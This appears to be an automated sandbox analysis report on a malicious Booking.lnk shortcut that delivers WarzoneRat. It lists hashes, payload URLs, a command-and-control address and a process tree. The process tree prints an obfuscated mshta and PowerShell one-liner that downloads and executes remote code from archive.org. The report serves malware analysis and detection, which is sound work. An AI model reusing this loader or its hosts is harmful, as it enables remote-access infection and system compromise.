Analysis
-
max time kernel
65s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
17-07-2021 16:04
Static task
static1
Behavioral task
behavioral1
Sample
Booking.lnk
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Booking.lnk
Resource
win10v20210408
General
-
Target
Booking.lnk
-
Size
1KB
-
MD5
c19da592366d6c173dee901add093e8e
-
SHA1
ddd038c49bee36557cd203b581948e98a5e787a1
-
SHA256
ab915bb1e45aba4cbbb762e4bac31510539b4a418d8466839bf6e4c1b40b87a2
-
SHA512
7d9c0d3aa4b8907598f3c0982b32cc35d9afb816de8e350aefac3993cfbcd0e2b3c84ce59d99b9de239b20a10179ea6db9370aa53c89b3c3a1e4c05db8bdd7b3
Malware Config
Extracted
https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt
Extracted
https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt
Extracted
warzonerat
103.147.184.73:5719
Signatures
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/776-149-0x0000000000400000-0x000000000041D000-memory.dmp warzonerat behavioral2/memory/776-150-0x0000000000405738-mapping.dmp warzonerat behavioral2/memory/776-154-0x0000000000400000-0x000000000041D000-memory.dmp warzonerat -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exeflow pid process 8 2484 mshta.exe 10 2484 mshta.exe 12 2484 mshta.exe 16 2260 powershell.exe 22 2260 powershell.exe -
Sets DLL path for service in the registry 2 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 1724 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2260 set thread context of 776 2260 powershell.exe aspnet_compiler.exe -
Drops file in Program Files directory 3 IoCs
Processes:
aspnet_compiler.exesvchost.exedescription ioc process File created C:\Program Files\Microsoft DN1\sqlmap.dll aspnet_compiler.exe File created C:\Program Files\Microsoft DN1\rdpwrap.ini aspnet_compiler.exe File opened for modification \??\c:\program files\microsoft dn1\rdpwrap.txt svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exesvchost.exepid process 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe 1724 svchost.exe 1724 svchost.exe 1724 svchost.exe 1724 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 620 -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeaspnet_compiler.exesvchost.exedescription pid process Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 776 aspnet_compiler.exe Token: SeAuditPrivilege 1724 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 776 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exemshta.exepowershell.exedescription pid process target process PID 652 wrote to memory of 2484 652 cmd.exe mshta.exe PID 652 wrote to memory of 2484 652 cmd.exe mshta.exe PID 2484 wrote to memory of 2260 2484 mshta.exe powershell.exe PID 2484 wrote to memory of 2260 2484 mshta.exe powershell.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe PID 2260 wrote to memory of 776 2260 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Booking.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\??\c:\program files\microsoft dn1\rdpwrap.iniMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\program files\microsoft dn1\sqlmap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\Program Files\Microsoft DN1\sqlmap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
memory/776-149-0x0000000000400000-0x000000000041D000-memory.dmpFilesize
116KB
-
memory/776-154-0x0000000000400000-0x000000000041D000-memory.dmpFilesize
116KB
-
memory/776-150-0x0000000000405738-mapping.dmp
-
memory/2260-126-0x00000150816E0000-0x00000150816E2000-memory.dmpFilesize
8KB
-
memory/2260-148-0x00000150824B0000-0x00000150824BE000-memory.dmpFilesize
56KB
-
memory/2260-136-0x00000150816E6000-0x00000150816E8000-memory.dmpFilesize
8KB
-
memory/2260-130-0x00000150824E0000-0x00000150824E1000-memory.dmpFilesize
4KB
-
memory/2260-128-0x00000150816E3000-0x00000150816E5000-memory.dmpFilesize
8KB
-
memory/2260-125-0x0000015082330000-0x0000015082331000-memory.dmpFilesize
4KB
-
memory/2260-116-0x0000000000000000-mapping.dmp
-
memory/2484-114-0x0000000000000000-mapping.dmp